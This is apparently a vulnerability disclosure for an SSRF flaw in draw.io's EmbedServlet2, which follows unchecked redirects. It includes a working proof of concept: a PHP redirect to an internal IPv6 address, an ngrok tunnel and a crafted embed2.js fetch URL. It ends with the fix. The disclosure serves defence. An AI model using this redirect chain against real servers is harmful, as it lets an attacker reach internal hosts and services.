Embed2Servlet uses url.OpenConnection() in https://github.com/jgraph/drawio/blob/7a68ebe22a64fe722704e9c4527791209fee2034/src/main/java/com/mxgraph/online/EmbedServlet2.java#L400 which follows redirects by default. However, the redirections are not being checked, hence it is possible to perform SSRF this way.
1: Start a redirector (redirect.php) and an ngrok server
<?php
header("Location: http://[fe80::1]");
ngrok http 80
2: Hit your ngrok server to redirect and see response go to fe80::1
https://[DIAGRAMS-SERVER]/embed2.js?fetch=http://[NGROK-ID].ngrok.io/redirect.php
setInstanceFollowRedirects to false in url.openConnection() in Embed2Servlet